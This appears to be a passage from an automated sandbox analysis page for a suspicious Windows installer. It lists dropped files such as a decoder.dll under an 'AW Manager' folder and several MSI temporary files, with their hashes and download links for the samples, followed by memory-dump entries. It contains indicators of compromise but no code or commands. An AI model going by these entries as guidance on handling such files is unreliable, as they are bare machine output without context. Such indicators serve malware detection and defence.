39d84e0c1fa355e2ec5f5d6080b189ca8682c831ab1ae25ebb30b24298295de6

SHA512
a947609d7953f5a15334b7666da65aca327ff1124bfd6b7d2e6b715e7595fe0c6614782861c3e9d945a070b885ac53b48cffdcf12bcb630caa0036ebaa8225d9

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
MD5
2ca6d4ed5dd15fb7934c87e857f5ebfc

SHA1
383a55cc0ab890f41b71ca67e070ac7c903adeb6

SHA256
39412aacdcddc4b2b3cfeb126456edb125ce8cadb131ca5c23c031db4431c5fc

SHA512
ce11aa5bd7b0da4baf07146e8377ff0331c1d4b04aaa4408373b4dd0fe2c3f82c84b179d9a90d26cdaa02180f22276d96cf491f9ede66f5f1da6f43cc72e5ac4

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
MD5
2ca6d4ed5dd15fb7934c87e857f5ebfc

SHA1
383a55cc0ab890f41b71ca67e070ac7c903adeb6

SHA256
39412aacdcddc4b2b3cfeb126456edb125ce8cadb131ca5c23c031db4431c5fc

SHA512
ce11aa5bd7b0da4baf07146e8377ff0331c1d4b04aaa4408373b4dd0fe2c3f82c84b179d9a90d26cdaa02180f22276d96cf491f9ede66f5f1da6f43cc72e5ac4

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
MD5
2ca6d4ed5dd15fb7934c87e857f5ebfc

SHA1
383a55cc0ab890f41b71ca67e070ac7c903adeb6

SHA256
39412aacdcddc4b2b3cfeb126456edb125ce8cadb131ca5c23c031db4431c5fc

SHA512
ce11aa5bd7b0da4baf07146e8377ff0331c1d4b04aaa4408373b4dd0fe2c3f82c84b179d9a90d26cdaa02180f22276d96cf491f9ede66f5f1da6f43cc72e5ac4

Download Submit
\Windows\Installer\MSI1139.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
\Windows\Installer\MSI12C0.tmp
MD5
5f1b243813a203c66ba735139d8ce0c7

SHA1
c60a57668d348a61e4e2f12115afb9f9024162ba

SHA256
52d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2

SHA512
083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5

Download Submit
\Windows\Installer\MSI1418.tmp
MD5
7468eca4e3b4dbea0711a81ae9e6e3f2

SHA1
4a0c34c342ee7c9df2a0d58d0b5e8bfe94d1251d

SHA256
73af1e816ec70be2a3e087af6ed7abc783c50c06b9df224f101e13a792df9837

SHA512
3f93a70c8cc05426e08a404c9d1922a46dd4122e7f42bc292f3b5064903a15e13069b58cb615918cc06deaf31bd5805a925cbd656aabc5d78068eb7224a63f56

Download Submit
\Windows\Installer\MSI204A.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI21C3.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI2359.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI2406.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI24D2.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI2540.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI25DD.tmp
MD5
9824aa0d785bef52b2f5ca21b7eacf8e

SHA1
54ae25b7ea5e6bd3e0a77f10650c6f441a0b1764

SHA256
e59b2b4d1466e834f1c797319b920ea13b3cdb04a7777dac9a31c6551ff5715a

SHA512
67d421cc29d53fca937e5afa492610ea3e6370dc46edcdc8568255ea53de8d04498cec43ee3e2a6c91fde92c4b2b6552fd3ae02cb3d6c88f28f1f3f4ede6e07a

Download Submit
\Windows\Installer\MSI81E.tmp
MD5
7468eca4e3b4dbea0711a81ae9e6e3f2

SHA1
4a0c34c342ee7c9df2a0d58d0b5e8bfe94d1251d

SHA256
73af1e816ec70be2a3e087af6ed7abc783c50c06b9df224f101e13a792df9837

SHA512
3f93a70c8cc05426e08a404c9d1922a46dd4122e7f42bc292f3b5064903a15e13069b58cb615918cc06deaf31bd5805a925cbd656aabc5d78068eb7224a63f56

Download Submit
\Windows\Installer\MSIB59.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
\Windows\Installer\MSIC16.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
\Windows\Installer\MSIC74.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
\Windows\Installer\MSID40.tmp
MD5
7468eca4e3b4dbea0711a81ae9e6e3f2

SHA1
4a0c34c342ee7c9df2a0d58d0b5e8bfe94d1251d

SHA256
73af1e816ec70be2a3e087af6ed7abc783c50c06b9df224f101e13a792df9837

SHA512
3f93a70c8cc05426e08a404c9d1922a46dd4122e7f42bc292f3b5064903a15e13069b58cb615918cc06deaf31bd5805a925cbd656aabc5d78068eb7224a63f56

Download Submit
\Windows\Installer\MSIDAE.tmp
MD5
43d68e8389e7df33189d1c1a05a19ac8

SHA1
caf9cc610985e5cfdbae0c057233a6194ecbfed4

SHA256
85dc7518ad5aa46ef572f17050e3b004693784d1855cca9390da1143a64fceae

SHA512
58a76b4cb8f53cee73a8fc2afbd69388a1f2ea30ea3c0007beaa361cb0cc3d4d18c1fa8ccf036a2d2cf8fa07b01451000a704a626d95bd050afe6ba808e6de1e

Download Submit
\Windows\Installer\MSIF26.tmp
MD5
7468eca4e3b4dbea0711a81ae9e6e3f2

SHA1
4a0c34c342ee7c9df2a0d58d0b5e8bfe94d1251d

SHA256
73af1e816ec70be2a3e087af6ed7abc783c50c06b9df224f101e13a792df9837

SHA512
3f93a70c8cc05426e08a404c9d1922a46dd4122e7f42bc292f3b5064903a15e13069b58cb615918cc06deaf31bd5805a925cbd656aabc5d78068eb7224a63f56

Download Submit
memory/288-113-0x0000000000000000-mapping.dmp

Download
memory/516-96-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/544-205-0x0000000000000000-mapping.dmp

Download
memory/612-104-0x0000000000000000-mapping.dmp

Download
memory/996-156-0x0000000000000000-mapping.dmp

Download
memory/1168-201-0x0000000000000000-mapping.dmp

Download
memory/1268-85-0x0000000000000000-mapping.dmp

Download
memory/1268-92-0x0000000074491000-0x0000000074493000-memory.dmp

Filesize
8KB

Download
memory/1268-93-0x0000000000260000-0x00000000002B7000-memory.dmp

Filesize
348KB

Download
memory/1360-89-0x0000000000400000-0x0000000002B5E000-memory.dmp

Filesize
39.4MB

Download
memory/1360-88-0x0000000002B60000-0x0000000002BA8000-memory.dmp

Filesize
288KB

Download
memory/1360-82-0x0000000000000000-mapping.dmp

Download
memory/1384-154-0x0000000000000000-mapping.dmp

Download
memory/1564-98-0x0000000000000000-mapping.dmp

Download
memory/1608-199-0x0000000000000000-mapping.dmp

Download
memory/1648-140-0x0000000000000000-mapping.dmp

Download
memory/1748-79-0x0000000004530000-0x0000000004532000-memory.dmp

Filesize
8KB

Download
memory/1748-73-0x0000000000000000-mapping.dmp

Download
memory/1748-76-0x0000000000400000-0x00000000019C2000-memory.dmp

Filesize
21.8MB

Download
memory/1748-77-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1864-66-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/1864-62-0x0000000000000000-mapping.dmp

Download
memory/1864-70-0x00000000743F1000-0x00000000743F3000-memory.dmp

Filesize
8KB

Download
memory/1892-118-0x0000000000000000-mapping.dmp

Download
memory/1972-155-0x0000000000000000-mapping.dmp

Download
memory/1988-59-0x0000000075511000-0x0000000075513000-memory.dmp

Filesize
8KB

Download
memory/1988-65-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2132-158-0x0000000000000000-mapping.dmp

Download
memory/2152-208-0x0000000000000000-mapping.dmp

Download
memory/2164-197-0x0000000000000000-mapping.dmp

Download
memory/2180-159-0x0000000000000000-mapping.dmp

Download
memory/2212-203-0x0000000000000000-mapping.dmp

Download
memory/2264-198-0x0000000000000000-mapping.dmp

Download
memory/2360-202-0x0000000000000000-mapping.dmp

Download
memory/2364-161-0x0000000000000000-mapping.dmp

Download
memory/2380-162-0x0000000000000000-mapping.dmp

Download
memory/2436-166-0x0000000006900000-0x0000000006901000-memory.dmp

Filesize
4KB

Download
memory/2436-164-0x0000000000000000-mapping.dmp

Download
memory/2436-169-0x000000000C600000-0x000000000C601000-memory.dmp

Filesize
4KB

Download
memory/2436-170-0x0000000026400000-0x0000000026401000-memory.dmp

Filesize
4KB

Download
memory/2436-167-0x000000003EF00000-0x000000003EF01000-memory.dmp

Filesize
4KB

Download
memory/2436-165-0x0000000007000000-0x0000000007001000-memory.dmp

Filesize
4KB

Download
memory/2436-168-0x000000000CC00000-0x000000000CC01000-memory.dmp

Filesize
4KB

Download
memory/2552-171-0x0000000000000000-mapping.dmp

Download
memory/2568-172-0x0000000000000000-mapping.dmp

Download
memory/2584-173-0x0000000000000000-mapping.dmp

Download
memory/2588-206-0x0000000000000000-mapping.dmp

Download
memory/2600-174-0x0000000000000000-mapping.dmp

Download
memory/2612-175-0x0000000000000000-mapping.dmp

Download
memory/2620-207-0x0000000000000000-mapping.dmp

Download
memory/2628-176-0x0000000000000000-mapping.dmp

Download
memory/2656-182-0x0000000004500000-0x00000000045EB000-memory.dmp

Filesize
940KB

Download
memory/2656-183-0x0000000000400000-0x0000000002BBA000-memory.dmp

Filesize
39.7MB

Download
memory/2656-177-0x0000000000000000-mapping.dmp

Download
memory/2688-179-0x0000000000000000-mapping.dmp

Download
memory/2716-189-0x0000000000770000-0x000000000078C000-memory.dmp

Filesize
112KB

Download
memory/2716-188-0x00000000043B0000-0x00000000043B1000-memory.dmp

Filesize
4KB

Download
memory/2716-185-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/2716-180-0x0000000000000000-mapping.dmp

Download
memory/2728-181-0x0000000000000000-mapping.dmp

Download
memory/2784-184-0x0000000000000000-mapping.dmp

Download
memory/3032-196-0x0000000002320000-0x0000000002321000-memory.dmp

Filesize
4KB

Download
memory/3032-204-0x0000000002325000-0x0000000002336000-memory.dmp

Filesize
68KB

Download
memory/3032-194-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/3032-192-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/3032-191-0x00000000004607D2-mapping.dmp

Download
memory/3032-190-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/4044-209-0x0000000000000000-mapping.dmp

Download
memory/4220-210-0x0000000000000000-mapping.dmp

Download
memory/6976-211-0x0000000000000000-mapping.dmp

Download
memory/6992-212-0x0000000000000000-mapping.dmp

Download
memory/7008-213-0x0000000000000000-mapping.dmp

Download
memory/7020-214-0x0000000000000000-mapping.dmp

Download
memory/7032-215-0x0000000000000000-mapping.dmp

Download
memory/7044-216-0x0000000000000000-mapping.dmp

Download
memory/7056-217-0x0000000000000000-mapping.dmp

Download
memory/7068-218-0x0000000000000000-mapping.dmp

Download